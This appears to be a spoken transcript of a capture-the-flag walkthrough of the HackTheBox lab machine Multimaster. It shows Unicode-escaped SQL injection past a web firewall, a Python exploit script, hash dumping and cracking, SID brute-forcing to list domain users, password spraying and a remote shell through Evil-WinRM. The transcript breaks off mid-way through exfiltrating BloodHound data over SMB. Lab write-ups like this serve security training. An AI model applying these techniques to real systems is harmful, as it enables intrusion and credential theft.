What's going on YouTube? This is Ipsec. I'm doing Multimaster from HackTheBox, which we're going to do two different ways. The very first way is going to be the intended way. It's the long and complicated one. I don't exactly know where to begin with it. I guess the SQL injection, which you can use to dump hashes that you can crack to get passwords, and then you can also use the SQL injection to enumerate domain users to use those cracked passwords against. And then you get a shell on the box with Windows remoting, and you got to jump through like 4 different exploits to get admin on the box the intended way. The final one being your member of server operator, so you can just modify a service, and then you start it up and get a shell. The second way is going to be the unintended way that came out last week or maybe a few days ago, and that is the Zero Logon exploit, because Multimaster is a domain controller, so we're just going to pretty much use this exploit. It's going to feel a lot like Eternal Blue, and we're going to then repair what we did and restore the password so we don't introduce a vulnerability long term. So with all that being said, let's jump in. As always, begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Multimaster, and then the IP address, which is 10.10.10.179. Can take some time to run, so I've already ran it. Looking at the results, we have a ton of ports open. The very first one being DNS on port 53, and then we have HTTP on port 80. It looks like it's in Microsoft IIS web server. Then we have Kerberos on port 88, and the standard RPC stuff on 135 and 139. And at this point, I'm thinking it's a Windows domain controller because we have DNS listening. We confirm it's a Windows server with IIS. And then you got Kerberos, LDAP, SMB, secure LDAP. So a bunch of things that just indicate this is going to be a Windows domain controller. But after the RPC ports, again, we have LDAP, and it's giving us the domain as megacorp.local. So the very first thing I'm going to do is edit my host file, so sudo vi etc host, and let's add an entry for this. So 10.10.10.179 megacorp.local. And going down the list, we have 445, nothing too much there. These ports aren't too interesting. Secure LDAP. Remote desktop 3389, and this is giving us some more information. We have the domain name, and of course we know this is the domain controller because we have LDAP listening. We have a computer name, which is Multimaster. You also have it here as the NetBIOS name. So let's go and add Multimaster to our certificate, or to our host file. Then what else do we have? We have the time, which could come in handy if we do any type of like Kerberos attack that requires us to be in sync. And outside of that, don't really see too much. We got clock skew right there, SMB. So nothing too interesting. In most videos, I'd probably go and try to enumerate things out of like the RPC, LDAP, or 445, or even the Kerberos port. However, I don't think it gets you anything on this box, and I've done it a bunch of times before. So if you want to see that type of stuff, just go to ipsec.rocks. For Kerberos, I would recommend looking at Kerbrute, which can identify valid usernames through some type of Kerberos pre-authentication. I talk about it there. LDAP, there's a bunch of ones about enumerating LDAP. You can just look at it like Cascade. Sizzle, I think, is the first one we do it. Or YPuff, we look at LDAP and Wireshark. So YPuff is probably a good one to look at for this. We even have a bunch on like enumerating open shares, such as like just type SMB, and you'll probably find a bunch of stuff related there. So not going to go into all that. We'll just skip it and go straight into the web server. And again, the reason I'm skipping it, because I don't want another like 4-hour video like Hackback. So let's go to 10.10.10.179, and we'll take a look at the site. Potentially, there we go. It is coming back. I was like, oh man, is the box offline? I don't know why it was so slow, but here we go. We got the website, and it looks like a calendar here. So I'm going to double click this, and when I'm clicking things around, nothing is working. So the very first thing I do when I see that happen is I press F12 and go to this console tab, and if there's a JavaScript error, it should be displayed there. but we don't get anything. So I'm going to go over into burpsuite, make sure intercept is on, click, edit, and I don't see anything red down here, so my burpsuite didn't trigger. So either burpsuite's not working, or this is just dead code and we can ignore it. Clicking around on the events, again, nothing's going off. So I don't think that's going to be anything. We can click on login, and we didn't get a thing into burpsuite. So maybe this is all handled through JavaScript, or something is not working. Admin password. Click login. And what did that say? Login system is currently under maintenance. Please try again later. I'm going to press Control-Shift-R to refresh the page, and we see something does go red. So, burpsuite is working. It's just not sending a request when we do that. So let's poke around on this to see if we can find out where a request will be. Clicking around on these links, we're not going anywhere. Go into the gallery. Again, nothing. Oh, we finally got something. Let's turn intercept on, click here. So it's probably configured to ignore images. And I'm going to try one thing real quick. Let's go to intercept options. Content type matches text. This could be a JavaScript app, so I'm going to get rid of this. Actually, instead of that, let's just uncheck this right now. And then admin password and try logging again. Maybe this is returning like a JavaScript thing. Nope. Okay. I was thinking it could be excluded because the page was JavaScript, if this is like Node.js, but doesn't look like that's the case. So going into this colleague finder, we do have burpsuite is on. I'm going to put a name. We'll do please subscribe. And enter. We see a red dot near the bottom of the screen, so burpsuite is saying something. And we're doing a post request to this. So we finally found something where we can send data to the server. We send this over and click send, and we don't get anything. So the name, let's try Multimaster. And we get forbidden. So we can't say the word Multimaster, it looks like, which is the host name of the box. We put Multimaster D, nothing. Test Multimaster, nothing. So how about case sensitive? Forbidden. So something is weird with that. How about master? Master is forbidden. So let's do a capital A here. So for some reason we can't send the word master, which is unique. I'm just going to do A and see what we get. And we get a bunch of information. So I'm going to copy this, and we're going to extract potentially all the emails. So let's copy this, create a text file. I'm just going to call it temp. Paste this, cat temp JQ. Maybe we should have put it in the big brackets. Let's see if that does anything. Okay. So JQ dot, like that. And then email. Am I doing this right? It's been a while since I've used this. Let's see, JQ dot, like that. And I'm going to grep for Megacorp. This isn't the correct way to use JQ, but it works. So let's do usernames, v usernames, and we can do %. s at megacorp.htb, remove that, and then we'll remove this. Okay, so we have a list of usernames because of that. Let's see, ID 1, 2, 3, 4, 5, 6, 7, 8 goes to 17. I'm going to do a name. I'm going to put Minato, and we're going to see if the ID stays the same. If Minato comes back as 1, then we'll know we didn't do a good job enumerating. But if Minato is the only result that comes back and it's ID of 16, I'm going to assume everyone's name has an A in it somewhere, because we probably have all the results. Unless someone's name doesn't have A and there's like an ID 17. But ID 16, we're good there. We could go and do a bunch to see if we ever go above 17. Like one person's name that wouldn't have an A is IPSEC, but I am not a member of this. So I'm going to assume I have everything. So probably the next thing I want to do is test SQL injection. So I'm going to do like that. And we get forbidden. So I'm going to remove characters until we don't get forbidden. And it looks like maybe that I was it. Or not the I, the single quote. Double quote is also an issue. So what I'm going to do is use wfuzz to enumerate all the special characters. So wfuzz-u for URL, HTTP 10.10.10.179/API get colleagues. -w for word list, opt sec list, and then this is fuzzing special characters, and then -d for data, and we're going to put it in name. So name :fuzz, like that. And I think that's it. And let's see. Probably going to want 415 is. Did I screw something up? We have a few 403s here. I'm going to do just a colon and see what 415 is. Is it actually responding 415? 403 forbidden. Okay. So we're getting everything with forbidden now. And there's an actual like web application firewall. If we ran GoBuster earlier, we would have seen it. That will just block you out if you do any type of brute forcing on this box. So there's going to be two things I do. Number one, I'm going to add -c for color, I believe, and -t1, which is timeout between request. I'm going to set it for 1 second. So it looks like that is good. I'm going to run this again. And let's see, it looks like we got similar results. I go again, it is forbidden. So I'm probably going to have to change the timeout even higher than 1. We're going to probably do 3 because, I don't know. We're just going to do that. 403 for the ampersand. So just going to pause the video. We're going to wait probably 20 seconds and then we'll be unblocked and we can hit enter there. I think it's been long enough. Going over to burpsuite. Yep, it is unblocked. Hit enter here. And maybe T is not timeout. wfuzz-h. What is T? -T. Number of concurrent connections. So definitely don't want that. Is there no timeout? Specify time delay between requests, S. So we want -s. And we are blocked. So gonna give it some more time. Should be long enough. So it looks like it is. And now we can do it this way. And it's going to take much longer, but we definitely won't hit any type of brute forcing detection. So while that runs, I'm going to go and I want to see if it actually says 415. I don't know where it's getting that. Percent. Maybe I should set it to go through the proxy so we can see exactly what a payload looks like, because I think we screwed up the payload somehow. But it's still kind of working. So if we do a ampersand, what do we get? 403 forbidden, URL encoded, 203 OK. Can we do that with a single quote? Forbidden. Let's do right click, convert selection, URL, encode all characters, %27. And it looks like we can. The question will be, does the application get the URL encoded or does it get the data? So let's put A there. And then we'll do a single quote. Let's do convert selection, URL, all characters. Oh, wait. That's not a dash. Dash dash plus dash. Let's see. Convert selection, URL, all. 2D. 2D is a hyphen. And that does not look like it did anything. So what this request is a single quote dash dash space dash. Let's see, we can do a single quote union select one forbidden. So there's one of these words is forbidden. Just convert, well, I don't want to convert the pluses to anything. See, single quote, space, dash, dash, space, dash. Oh, they actually did it, I think. No, it didn't. Because we should get something back. So if we get rid of one of these dashes, yeah, I'm not exactly sure, but this has finished, and it looks like the only bad character is going to be this comment and a hashtag. So let's see. I want to look at the proxy. So I think I can just do -p http localhost 8080. Is that how we specify a proxy? Maybe it's http localhost 88. Let's see. wfuzz-h grep-i prox IP port type. So it wants IP, which is localhost, port 8080, type HTTP. Capital. There we go. So let's see. Here's the very first one it does. Just going to send this to repeater. Go, and we get unsupported media type. So we are getting a 415 in wfuzz. And looking at this, we're doing content type application /x www form encode. And here we have application JSON. So this is also something we should take into account for. So didn't really affect our wfuzz, but it should always be replicating what we see. So we can do -h for header, and we can say content -type like that. And one form encoded. We want application JSON char set UTF-8. Like this. And in 3 seconds, we should see response 200. So that's looking much better. We can just kill that out. And we got to play with this request a little more. So let's try sending a single quote. And we get 403 forbidden. We had tried converting this to hex, which is %2d, I believe. No, that's %2d's hyphen. I forget what single quote was. So right click, convert, URL, all characters, %27. And that works, but we don't get anything. I would expect like an error message or something if I'm sending a single quote to an SQL field that has injection or something. The one thing I notice is we do specify character set UTF-8, which is Unicode. So we can try sending it Unicode as well. And all we do is \u27. And we get an internal server error, which is very good for us. So we can do A like that. And let's try \u2d, \u2d. We want to put a space u2d. And we still get an error occurred. 2d is going to be a dash, I believe. So let's look at this. Engagement tools, convert selection, URL, all characters. Yeah, 2d is dash. So that did not work. But we probably have some type of SQL injection. So what I'm going to do is copy this, make sure we have a valid request. I'm going to copy to file, and we're going to do colleague.request. And I'm going to run SQLMap while we play with this, because there is a tamper script. So if we locate tamper grep SQL, let's see all the tamper scripts we have. So it's in user share SQLMap tamper. So let's copy this. And the one we probably want is character uni encode. I don't know the difference between uni encode and uni encode escape. Does this give examples of what it does? Let's go cd less char unicode escape. Let's see. Okay, what's encode? So it looks like it's going to change to %u00. So is that going to work here? %u00. What was it? 27? 200 OK. \u27. Okay, so we probably want the Unicode escape. So let's do SQLMap -r. We have to go to the previous directory, so I'm just going to do cd dash SQLMap -r colleague.request -- tamper is equal to char. What is Unicode escape? Like that. And then what else do we do? I'm going to do -- delay 5. We can do level 5 and risk 3 -- batch, because I don't want this prompting me for any questions. So now we can run it. And I did a delay of 5 instead of 3 because I'm also going to be playing around. Ooh. Oh, I have remnants from when I actually did this machine. So let's rm .SQLMap. It's a directory. Let's rf clear all SQLMap history from my box. Okay. So now it's going to run. Then this is probably going to take a long time because we have a long delay. We could say --dbms MS-SQL because we know this is probably going to be a Microsoft SQL box. At least I hope it is, unless if it's not, this is going to fail. But it skipped doing checks for like MySQL, Postgres, Oracle, etc. So maybe I'll go a little bit faster with that. So we know we have something here. Let's try if we can do mixed casing. So I'm going to do AR. Okay, let's convert R to hex. So it's 7.2. A/U 7.2. And we get an error has occurred. We just did /U 7.2. (0072). Okay, maybe we should do with 2 zeros. So that looks right. We can do also mixed casing. That's what I was, or not mixed casing, mixed encoding. That was the main thing I was testing. If we did like a standard ASCII and then Unicode. So, and Unicode's going to be 2 bytes. That's why I just added 2 zeros. So let's see. We want to do 2.7, which should be a quote, and then a space 2D, which should be a hyphen. And then a space hyphen. Didn't get any data back, but we don't have any type of error. So we can try union select 1, 2, 3 forbidden. I want to actually get a response back real quick. So 1, 2, so ID is 1, name is 2, positions 3, emails 4, source is 5. So this select statement probably has 5 things. So with a union, I should go 5 because probably select ID, name, position, email, source from table. So I'm going to do union select 1, 2, 3, 4, 5. And then we get forbidden. So let's do convert selection, URL encode, all characters, /U 006F. Let's try it with select, convert, URL, all characters, /U 006. And we have an SQL injection. So 1, 2, 3, 4, 5, and we can say, hey, let's take the email and put, please subscribe. Let's do single quotes. And we're probably going to have to say those are going to be /U 0027. And we can put data here. If we go back to SQLMap, we can see it is still taking its sweet time. So what can we do with this? I guess we can start building a Python script to start exploiting this. And then maybe SQLMap will finish, maybe it won't. So let's do vi, well, I guess we can just call it exploit.py. And we're going to probably want import request, import JSON. And then we can do URL is equal to HTTP 10.10.179/API get colleague. Did I spell it right? Colleagues. Okay. And then we got to make the request. So let's do At least let's first just make it so we can just get a page with static data. So request dot, I guess we can do get, I think. URL data is equal to, and data equal name A, like that. Data is equal to data. Print r.text. Python 3, exploit.py, request.post. We have to set the header. So we can do header. And this is content type. Is there a dash? There is a dash. Colon, and then we can just copy this. That. Headers equals header. An error has occurred. So let's do proxy HTTP 127.0.0.1. Proxies equals proxy. Go over to burpsuite. If I can type correctly. And specify the port. There we go. And we see the request is not putting it how we expect. So we have to say it's JSON data, I believe. So let's see. Let's try JSON is equal to data. Does this fix it? It looks like it does. So if we send that, we get data. If we tell burpsuite to keep going, we get this. So now what we want to do is see if we can send unicode. So I'm going to try \u 0041 maybe. That's capital A. We'll see if it's case sensitive. Send Python. Let's turn intercept on. And we see it actually just encoding it for us. So this is actually a pretty big headache to try to solve. And I spent a while trying to do this in a good way, but never could. So we're going to create a function called genPayload, and we're going to pass it, I guess, the string payload. I'm going to do for char in payload, and we'll say, let's actually switch to a Python interpreter real quick so we can get this piece correct. So char is equal to A, and we're looping for every character. So we can say A is equal to \u, and then we want to say hexadecimal padded 4 times. So that's what that :04x does. Then we can do .format, and we're going to grab the ordinal value of char. Can't decode byte. Now let's try R. There we go. That's what we want. So we're going to do, let's change this to be query. Query query, and then payload plus equals 04x dot format board care. And we can say, man, my escape key is like delayed or something. Like that. Plus equals return payload. So let's give this please subscribe. And we're sending this to the proxy still. So if we intercept on, send this, we get please subscribe, and we probably should have did data is equal to, let's see. What if we can do like this? Like that. And we want this to be gen payload. Please subscribe. Okay. Send the exploit. And that looks good, but because we put the JSON and single quotes, we're escaping everything. So this probably not going to work. Request invalid. So I'm going to go back and change this to be data and not JSON. Because even though we're passing it a JSON string, we're not passing it a JSON object, if that makes sense. If we got rid of these single quotes on the end, then this would be a dict and then, or a dictionary, and request would know how to turn that to JSON. But because we put these single quotes, we're passing it a string. It just so happens the string looks like JSON. And I'm just doing that because, in my experience, that was the easiest way to get this Unicode stuff in. So now we got name is equal to this, and that's please subscribe. So that looks good. So we could try, what was it? A single quote union select 1, 2, 3, and we put data in email. So we'll do please subscribe 5. Like that, right? That looks fine. And let's send it. Send this to repeater. We have that there. And if I turn intercept off, we have data. So this is exactly how we want it. The thing we probably want to do now is make it so we can actually query data. And looking at this, we have SQLMap still going. So we can import CMD. And let's do class exploit cmd.cmd. Prompt is equal to please sub. And then def default self line, like that. Let's see. Probably want to put the header yank, place the header there. Grab data, grab that. Probably don't need to send this to the proxy anymore. Something is going on with my Vim hotkeys. Okay, so we just need to make data. So we can say payload is equal to gen payload line. And then data, we put all the way up here. So let's grab that. Capital V, and then greater than sign, which is that if you don't know. And gen payload. Payload. Oh, we're just doing like that. That should be fine. R is not defined. Oh, we need to loop. So cmd dot cmd, oh, this is exploit. Exploit dot loop. Is it cmd loop? I always forget how to start this. Sweet. So A union select 1, 2, 3, 4, 5. That. Awesome. Please sub. Great. So now we have a way to just do raw SQL or query it, but I want to make it easier to do unions. So what I'm going to do is we'll say define do union self line, and the payload is going to be a union select 1, 2, 3, and we're going to end that plus line 5, like that, I believe. Print payload. I just want to see what this looks like. Union, please sub. That looks good. So now we can send this request. So I'm going to go up here. I'm going to do 3 Y to yank, P to put, and here I'm going to do payload is equal to gen payload. So here we're going to do the Unicode escaping. And let's see. Data. That looks fine. Let's see what this does. Python 3, exploit.py, union, A. And we put A where the email is. So now we probably want to have this only grab this field. So let's go here. And we will say R is equal to json.loads r.text. And then we can print R 0 email. Let's see what that does. So the 0 grabs what's in between this, and then email, of course, grabs email. So union A, and we're good. So we can probably run MS-SQL commands and verify we're actually using Microsoft SQL. I'm going to turn burpsuite off, MS-SQL Injection cheat sheet. Let's see what a command is. What? Where do I go? Ignore this risk. That's bizarre. @ version. So if we do @ version, we can see Microsoft SQL Server. So we can say username, see what user we are. Did not get anything. Maybe system user. Didn't get anything. User? Nothing. Oh. We have to specify union. And we'll say try except print r.text. So if we can't load the JSON, we'll just print the output. Union system_user. Finder. We can try union user, finder. Login name. I wonder if we can actually do a nested query. So if we do union, I really don't know if this is going to work. Hey, it did. So we can actually do nested queries with this union. So if I do select one, yep. So that's awesome. So we can list names. Let's see what this does. Maybe just print R. Actually, I know what I want to do. We'll say rename this to JS. And now we can just print r.text. So what happened was it passed this line and then crashed on this print statement. So r.text didn't exist anymore. So that's why I did that. Union. We wanted to grab this. Null. Okay, that didn't work. Let's see. We probably don't have this master assist logins permission. So current database, we can do DB name. Union. Like that. Hub_DB. List column. Select name from column where ID. I wonder if there's list tables. Here we go. Select name from object. I'm going to make this bigger. That's probably helping some people. Like master column with type name. These are all like super long queries that I don't understand. Let's see. Select name from, try this. Union. Like that. And some other DB, we'll say hub DB. Oh, that's got weird quotes there. And that did not work. Let's try limit 1 to only return one result. This is Microsoft SQL, so maybe it's done this way. There we go. Can we do this second result? I don't know how to work this top command. I wonder if we do top 2. Let's see. Group concat MS-SQL. Database guide. String aggregator. Okay. So let's get rid of this top. And we can say string ag name, and we'll separate with a comma. Did I do that right? string agg. Do we want to do single quotes? There we go. So we have two tables. We have colleagues and logins. So we probably want to get stuff out of logins. So let's see, we can probably say, let's do union select string ag emails, maybe. From logins. Let's just try this. No. So instead of maybe email, name. So I think we are doing something wrong. Select. Let's go back to top one, name from logins, username. Okay, so we have username, we got that. Password, and sweet. So we have a list of passwords probably. So we can do string ag username let's see, I'm trying to think of a good way to do this. Can we do 2? I don't think so. Username, password. Well, we can get a list of usernames this way. And there was one that did not have an A, egress. But I'm fine with this for now. So v usernames, let's paste, and search for comma, replace with line break. Let's try this again. Search for comma, replace with \r/n. And we'll just get rid of the special character. Maybe I just wanted \r. But I have a list of usernames. There's probably some duplicates there, but that's fine. Probably want to grab all the passwords. And there's probably a better way to do this, but I'm getting fed up with this SQL injection. Oh god. Okay, thank god. It's separated by commas. I was like, that's a long string of hex. V pass hashes %s comma \r g %s comma \r g. There we go. Now we got a list of password hashes. That is echo-n wc-c 96 characters. Let's see. Password hash 96 characters. There's probably like a thing that helps, like a tool like hash identifier. That's probably actually called hash identifier. 96. Hash ID. Let's see. Hash identifier, which is outdated. Python 3. This looks like it should be fine. So let's go cd opt, get clone, cd hash ID. Do we have everything to run it? Please work. Oh, it wants standard in. Okay. copy, paste. SHA-384 most likely, or this Skyne, whatever. So, okay. SHA-384 is what we're going to guess first. Let's go cat pass hashes. Let's grab this. I'm going to SSH into another box. This is my server that has hashcat and a few graphics cards. CD hashes, and we can do v SHA-384, paste, and / hashcat example hashes less. I'm searching for 384, which looks like it was a mistake because that exists quite a bit in these. SHA-2 384, 10800. Let's just grep 384, grep-i SHA. Probably want SHA-2 384. I'm going to try that first. Grep-i SHA-2 384. -B for before, mode like that, -A for after. I'm going to make sure this is 96 characters. So echo-n, wc-c, 96. So probably right. Hashcat-m, 10800. And then we need hashes. So that's in hashes SHA-384. And then the word list opt, word list rockio. So let's see if this works. Initializing. And it doesn't look like it recovered any. So maybe that wasn't it. Let's try the SHA-3 one. So SHA-3 384. I don't know the difference between these, but this is 17500. So 17500. And it's going to initialize again. It doesn't look like any cracked. Yeah, nothing. Let's go back to our grep. And let's just get rid of the SHA-3 and do -384. I probably have to escape it. And I guess there's 17900. These are all looking like the 96 characters in length. So let's do 17900. And see if this works. And if we can't find a hash, then we'll start using rules, but it looks like we just cracked 3 of them. So I was going to say, at that point, once I'm relatively confident I have one of the hashes, then I start specifying rule files like rules inside pro password pro. But we don't have to do that because we cracked it. So let's do --show. And we got password 1, banking 1, and finance 1. SQLMap still chugging along. So let's just exit this. V passwords, password 1, banking 1, finance 1. Okay. And we can exit our cracker. Crackmap exec, SMB. Is it? I think it's crackmap exec IP, then protocol. Let's see. Does it give? Crackmap exec, SMB, usernames, passwords, and see what happens. Oh, we never gave it an IP. It'd be amazing if something happened there. But 10.10.10's 179. Let's see. Successfully queried it. And is it going to do logins? It's taking its time. We probably have to specify -u and -p. -u, -p. CrackMap exec is really finicky with the arguments, and if you don't do them in the correct order it expects, bad things happen or nothing happens, and it just takes a while and you burn time. So always make sure you have the syntax right with CrackMap exec. And it looks like we may not have any hits. I wonder how many more users we have. Probably a lot because we didn't do deduplication on this username list. So no hits. So we have a few passwords, we have a bunch of usernames, and nothing. So at this point, it was a lot of spinning wheels, trying a lot of things that I didn't really record everything I tried. But there is a second way we can do enumeration in SQL land, and that is querying domain users. So right here, we are just querying people in the database. But we can actually make a query to the domain controller from my MS-SQL and get it that way. So that's what we're going to do. Again, it's going to be the union command. And let's see. What is the command? I think it's suser SID. And then the domain, I think it's megacorp / administrator. Try that. Sweet. So we got something. It tried to display a binary thing. The next thing we could do is a function to convert that into hex. So binary to hex string, like that. And this is the SID. It's in hexadecimal format. So this is kind of used to like the S-1-2-1-string whatever. Let's see. Default admin SID 8. See if I can pull it up real quick. Let's see. Well-known SID. So it's kind of like this. S-1-5-21. So we can see the first one, 5. First one is 1. Then you get 5. I don't know where 21 is, but trust me, this is the SID in hex format. So the user portion of the SID is going to be the last 4. So this. So all we care right now is this. And this is in little endian format, which is least significant bit first. So if we want to convert that into regular format, because if we look at what F401 is, if we do Python 3 0x F401, that is a large number. But again, literal endian, so we convert this to a format which we're used to, which is most significant bit first. We go 01 F4. Again, I just took these bits and put them this way. It is key that you break them up into each hex pair, because if you don't do that, then you would get 00010 for F, which is very different than 014F. So again, break it up into the pairs and then go the other way, right to left, to convert it. So if we do 0x01F4, it's 500. And 500 is the default SID for the very first user of a domain, which is administrator. We could potentially find other users' SID if we search for let's try egress. Does he exist? The user may not exist. So Aldum has something. So we can grab the last 8, 1, 2, 1, 2, 2B. There we go. So we're going to grab this, break it up into the pairs. So this guy's SID will be 0C2B, and that's 3115. So let's brute force SIDs. And in order to brute force a SID, we have to be able to look up someone's name by this SID. So if we go back here, do union suser underscore SID name, and then paste the SID, we can get this. So let's try 1, 2, 3, 4. This was 2B0C, and that's Autumn. So we can create a program that will just increment this up to a very high number, like 500 to 2,000 or something, and then get all the domain usernames. So let's do that now. I'm just going to copy this. And we'll go back to the exploit.py, and I'm going to kill this SQLMap. Eventually this finishes, but we've already done what we needed to do. I had actually never used Microsoft SQL to extract the hashes. When I did the box the first time, I had SQLMap do that for me. So that piece was live. Hope it went well. Let's see. So let's do a new function. Def do brute self line, and we could create a whole new program to do this, but I'm lazy. Let's see. So I'm going to paste that, and let's see. Actually, let's get a SID. Let's do a function up here. Def get SID. And we'll say n, that would be number. So domain is equal to this. And I really hope this doesn't like convert this into decimal. We'll have to see exactly what this does. And then user will be struct.pack. Little endian integer on that. And then we can return domain user. Let's see what this looks like. And we want to get rid of this F401. Okay. So def do brute print get SID line. Brute 500. Struct is not defined. Import struct. Brute 500. Not exactly what we want, but it did a better job than I expected. I didn't expect it to print this. I thought Python was going to do some magical typecasting and convert that. We just have to get the string of this. So user str, like that. Brute 500. That did not do it. That did nothing. So let's see. User equals user.hex. Brute 500. F40. There we go. That looks good. So if we do 501, that's going to be F402. Or no, F5. Least significant. Yeah. And then 502 will be F6. And there we go. So that piece is done. So let's see. We can say start stop is equal to line.split on space. And then for I in range start stop print I. I'm just going to comment this one out. Brute 500, 501. Let's see. We got to convert these to ints, I think. I wish I read that error message, but I'm guessing it's a string. Brute 500. There we go. So now we can say SID is equal to get SID I. And we can do payload is equal to. Let's just copy this. My escape key still isn't exactly working, which is frustrating. That. And line is going to be, let's see, it was suser s name and this will be SID. See, I'm glancing over that. Union, select 1, 2, 3, suser, sname. I think that's good. Let's see. Snake a few lines, paste them, indent, and let's see. So that's good, that's good. We're trying to load. And then we can say if JS0 email. If that exists, then print F I and the email JS0. This is really ugly code. Okay, accept. And I'm going to do time sleep 30. We'll do time sleep 3. Because we have the account lockout thing, or not account lockout, the web application firewall blocking us. So Python 3 exploit, brute 500, we'll do 504. And hopefully we get at least one. If we don't get any, then we know we screwed up the command. And I'm guessing we screwed up the command. Let's see. We'll definitely need that there eventually, but let's comment this out for now. Make sure our script isn't crashing. And we can print the payload real quick. So union select 1, 2, 3, suser, sname, like that, 5. Let's just copy this and run this command. Okay, that worked. So we got an error somewhere else. That. I wonder if this is where the error message is. I should have done this in Visual Studio Code. Oh, I see the issue, and I'm going to change up my script a little bit. The issue is I did not encode the payload. So I'm going to take these two lines. I'm going to make a new function. Def make request payload. Like that. And we can say payload equals gen payload payload. There we go. That should be better. And here we can get rid of this, make request. Uh-oh, I deleted something I didn't want to. So my clipboard, hey, it is. Payload is equal to that. No, it's not my clipboard. Let's see. Payload is equal to this. Put this in a double quote. And we wanted to do here. And this is SID. And a double quote. And a double quote. There we go. And we can do payload. That looks fine. And I called it make request, right? Yep. Brute 500 501. None type has attribute text. Print payload. Brute 500 501. We're getting there. We need to return, we'll just return our.text. And here, that's union brute 500 501. Okay. Took longer than it should, but we got it. So we can now put these tries back in. Brute 500 505. And again, there's a 5-second sleep between everything, but we can start enumerating. And we probably want to enumerate beginning at, I think, 1000. The default, like the built-in accounts will be starting at 500. And I think when users actually start getting accounts, those are in like the 1000 range. So I'm going to do a super long brute, and we're just going to, I guess, pause the video, I think, because this is probably going to take like 30 minutes to get all the SIDs. And I may just cheat and go through notes and pull up the exact SIDs I want, because every request takes 5 seconds. So we have 5,000 seconds, and 5,000 seconds to minutes, about an hour and a half. So this piece takes a while. And yeah, I don't want to wait around. So let's cheat. I'm going to do brute 1110 because that's where the stuff we want starts. And I'll just do that. So enumerating usernames every 5 seconds, you should see a new user pop up. So we can start adding these to our user list. So we can clean up our sessions. That v usernames, and we can add, let's add them to the top. Tushikikatomo. I don't even want to pronounce that one. Andrew, Lana. So it looks like the usernames are not like first initial, last name. So it looks like to log in, it's like standard convention, but after that, it's not. So we can look at everything that starts with A. So I wonder if Andrew is I don't know. LDOM doesn't sound like a last name. But I wonder if we go back to the page real quick. 10.10.10.179. Colleague finder, Andrew. I don't think there's an Andrew here. Who is Aldom? Houston, ALDOM. Yeah, he's Alessandro. Maybe, I don't know. I'm going to stop trying to make sense of a fictitious scenario, and we're going to run crackmap exec again. So crackmap exec smb 10.10.10.179-u usernames -p passwords, and we'll see if this gives anything. And we have a hit, but we don't see it say pwned afterwards. It just has this plus. So we could do -u tushikikate like that. Did I do it right? Login failure, yes. So we can say finance1 and then -- shares to see what we have write access to, and we could start looking at that. Let's see, is it going to show? It does. We have a few drives. We have CE, DFS. We could potentially go and look at through like group policy and things, but crackmap exec has other things like WinRM, and if the user is a member of the Windows remoting group, we'll be able to access his box this way. So let's see if WinRM does anything. And it does. So it says pwn, so we can get a shell this way. So let's use Evil-WinRM. The first thing I'm going to do is make a directory logs. I'm going to do script, and we'll call this, what's his username? Copy script this.log. So now we're logging everything we do as this user. Evil-WinRM -i for IP 10.10.10.179-u. I think it's megacorp / like that. I'm gonna do 2 backslashes -p finance1. And we get a shell in the box. Oddly enough, I mean, we logged in with this username, and here's our home directory, which is bizarre. So we can do whoami /all to see, I guess, groups or things. We can also do net user /domain to get a list of all the accounts. So we have a few service accounts, bunches and bunches of users. So if we just go to cd /users, there's only a few that log on to the server. So Jordan, Syok, this is us, S-Bauer. Generally, the first thing I'm going to do, because I'm on a web server, is I want to try to go into the www directory. So I went into inetpub and then www-root, because if we can get a shell as IIS, chances are we're going to have the SC impersonate privilege, which lets us escalate. And doesn't look like we can. So let's go and go into a place where we can write files, and I think it's printer color. scissor directory. That is not, let's see, printer color directory Windows. That's not it. Oh, System32 spool drivers color. Spool drivers color. This is generally just where I like working out of in Windows, because it's a directory underneath Windows, and sometimes you'll see App Locker just whitelist anything in this directory, and it's normally word writable. So I can do echo ipsec test, and we have it. So this is one of the first things I test to write to. Let's try running WinPEAS. So let's do cp opt privilege escalation awesome script suite WinPEAS exe WinPEAS bin release Jesus cd opt privilege escalation script find.grep.exe. This is the easier way to do it. Oh, WinPEAS, then WinPEAS exe. So make dir dub cp WinPEAS.exe or WinPEAS slash WinPEAS exe. Oh, I don't think that was what I thought it was. Yeah, that was showing me the directory name. This is what I want though. Let's just cp this to be htb multimaster dub. Awesome. So we can go cd dub python-m http server, and we'll do python 3. And we can just do wget. Oh, we can close this shell. HTTP 10.10.14.2 port 8000 winpeas.exe-o winpeas.exe. It's going to download. Looks like it does. Let's try running it, and we'll see what this has. It is now finished, so let's go and look at it. There's a lot of output. Okay, computer name, some stuff, system environment variables, nothing special, no laps, nothing special there, no AV was detected, whitelist paths, that's funny, power view, this is PowerShell without PowerShell, and then revert. So I guess there's probably some type of cron that is running and restoring the box with that revert.ps1. And the fact that the whitelisting power view and stuff, I'm guessing AMSI is enabled even though this is saying no AV was detected. PowerShell settings, transcripts, nothing. Drive information. I don't know what's under E. We can always check that one. Nothing interesting there. We have all access there. This user probably is logged in the box, Cyork, auto logging found. And it doesn't put the password here anymore. I think the password's stored in, I forget what it's called. The Windows like cred store. I'm drawing a blank at the name. But it's in a place that gets encrypted now, so we can't just read it. Bunch of services, but we can't modify any. We have writable paths and folders. Nothing too interesting. Doesn't look like anything too interesting here. I don't think we can write into... What is this for? Is this services? Auto run applications. We can't reboot the box, so auto run isn't going to be too handy for us. Listening ports. We know everything there. We have a few ports listing on 127.0.0.1 that I don't recognize. Firewall rules. Deep happy. That is the how things are protected nowadays. And we don't have anything from WinPEAS. This is a Windows domain controller though, so maybe we should run BloodHound. So let's do, let's go and download it. So BloodHound, GitHub, cd opt. Do I have, I'm gonna do git clone BloodHound. And while I do that, I also go to the releases. Sample database generator. Where's release? Pre-compiled binaries. So we'll want this one as well. And Linux x64. Save file. We'll, let's see. rm-rf. Just going to delete my previous BloodHound directory. We'll do unzip, downloads, BloodHound Linux x64, 1.zip. And while that goes, okay, it's done. We can go into BloodHound. And we want to find sharphound.exe. That's just in ingesters. So cp sharphound.exe and htb multimaster dub. And wget. And now we can download sharphound.exe. And then run it. Probably should specify like -c space all or something. But we have a BloodHound zip. So the easiest way to copy this to us is probably just going to be SMB. So I'm going to do impacket -SMB server -SMB2 support. Call it share, and we'll share a directory. So now, well, we have to do sudo. So I can do cp this to 10.10.14.2/share. And we have now copied BloodHound to a server, or maybe it's in the process of copying. Cannot perform it? What? bloodhound.zip. We're not going to specify a username and password. Let's see. We'll copy a smaller file. This photo. 10.10.14.2, share. I wonder if I'm going to have to do username and password. SMB2 